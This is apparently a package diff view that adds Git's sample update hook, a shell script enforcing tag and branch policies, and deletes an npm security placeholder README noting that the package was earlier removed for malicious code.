# This boolean sets whether deleting tags will be allowed in the
|
15
|
+
# repository. By default they won't be.
|
16
|
+
# hooks.allowmodifytag
|
17
|
+
# This boolean sets whether a tag may be modified after creation. By default
|
18
|
+
# it won't be.
|
19
|
+
# hooks.allowdeletebranch
|
20
|
+
# This boolean sets whether deleting branches will be allowed in the
|
21
|
+
# repository. By default they won't be.
|
22
|
+
# hooks.denycreatebranch
|
23
|
+
# This boolean sets whether remotely creating branches will be denied
|
24
|
+
# in the repository. By default this is allowed.
|
25
|
+
#
|
26
|
+
|
27
|
+
# --- Command line
|
28
|
+
refname="$1"
|
29
|
+
oldrev="$2"
|
30
|
+
newrev="$3"
|
31
|
+
|
32
|
+
# --- Safety check
|
33
|
+
if [ -z "$GIT_DIR" ]; then
|
34
|
+
echo "Don't run this script from the command line." >&2
|
35
|
+
echo " (if you want, you could supply GIT_DIR then run" >&2
|
36
|
+
echo " $0 <ref> <oldrev> <newrev>)" >&2
|
37
|
+
exit 1
|
38
|
+
fi
|
39
|
+
|
40
|
+
if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then
|
41
|
+
echo "usage: $0 <ref> <oldrev> <newrev>" >&2
|
42
|
+
exit 1
|
43
|
+
fi
|
44
|
+
|
45
|
+
# --- Config
|
46
|
+
allowunannotated=$(git config --type=bool hooks.allowunannotated)
|
47
|
+
allowdeletebranch=$(git config --type=bool hooks.allowdeletebranch)
|
48
|
+
denycreatebranch=$(git config --type=bool hooks.denycreatebranch)
|
49
|
+
allowdeletetag=$(git config --type=bool hooks.allowdeletetag)
|
50
|
+
allowmodifytag=$(git config --type=bool hooks.allowmodifytag)
|
51
|
+
|
52
|
+
# check for no description
|
53
|
+
projectdesc=$(sed -e '1q' "$GIT_DIR/description")
|
54
|
+
case "$projectdesc" in
|
55
|
+
"Unnamed repository"* | "")
|
56
|
+
echo "*** Project description file hasn't been set" >&2
|
57
|
+
exit 1
|
58
|
+
;;
|
59
|
+
esac
|
60
|
+
|
61
|
+
# --- Check types
|
62
|
+
# if $newrev is 0000...0000, it's a commit to delete a ref.
|
63
|
+
zero=$(git hash-object --stdin </dev/null | tr '[0-9a-f]' '0')
|
64
|
+
if [ "$newrev" = "$zero" ]; then
|
65
|
+
newrev_type=delete
|
66
|
+
else
|
67
|
+
newrev_type=$(git cat-file -t $newrev)
|
68
|
+
fi
|
69
|
+
|
70
|
+
case "$refname","$newrev_type" in
|
71
|
+
refs/tags/*,commit)
|
72
|
+
# un-annotated tag
|
73
|
+
short_refname=${refname##refs/tags/}
|
74
|
+
if [ "$allowunannotated" != "true" ]; then
|
75
|
+
echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2
|
76
|
+
echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2
|
77
|
+
exit 1
|
78
|
+
fi
|
79
|
+
;;
|
80
|
+
refs/tags/*,delete)
|
81
|
+
# delete tag
|
82
|
+
if [ "$allowdeletetag" != "true" ]; then
|
83
|
+
echo "*** Deleting a tag is not allowed in this repository" >&2
|
84
|
+
exit 1
|
85
|
+
fi
|
86
|
+
;;
|
87
|
+
refs/tags/*,tag)
|
88
|
+
# annotated tag
|
89
|
+
if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1
|
90
|
+
then
|
91
|
+
echo "*** Tag '$refname' already exists." >&2
|
92
|
+
echo "*** Modifying a tag is not allowed in this repository." >&2
|
93
|
+
exit 1
|
94
|
+
fi
|
95
|
+
;;
|
96
|
+
refs/heads/*,commit)
|
97
|
+
# branch
|
98
|
+
if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then
|
99
|
+
echo "*** Creating a branch is not allowed in this repository" >&2
|
100
|
+
exit 1
|
101
|
+
fi
|
102
|
+
;;
|
103
|
+
refs/heads/*,delete)
|
104
|
+
# delete branch
|
105
|
+
if [ "$allowdeletebranch" != "true" ]; then
|
106
|
+
echo "*** Deleting a branch is not allowed in this repository" >&2
|
107
|
+
exit 1
|
108
|
+
fi
|
109
|
+
;;
|
110
|
+
refs/remotes/*,commit)
|
111
|
+
# tracking branch
|
112
|
+
;;
|
113
|
+
refs/remotes/*,delete)
|
114
|
+
# delete tracking branch
|
115
|
+
if [ "$allowdeletebranch" != "true" ]; then
|
116
|
+
echo "*** Deleting a tracking branch is not allowed in this repository" >&2
|
117
|
+
exit 1
|
118
|
+
fi
|
119
|
+
;;
|
120
|
+
*)
|
121
|
+
# Anything else (is there anything else?)
|
122
|
+
echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2
|
123
|
+
exit 1
|
124
|
+
;;
|
125
|
+
esac
|
126
|
+
|
127
|
+
# --- Finished
|
128
|
+
exit 0
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=vmw-atk for more information.
|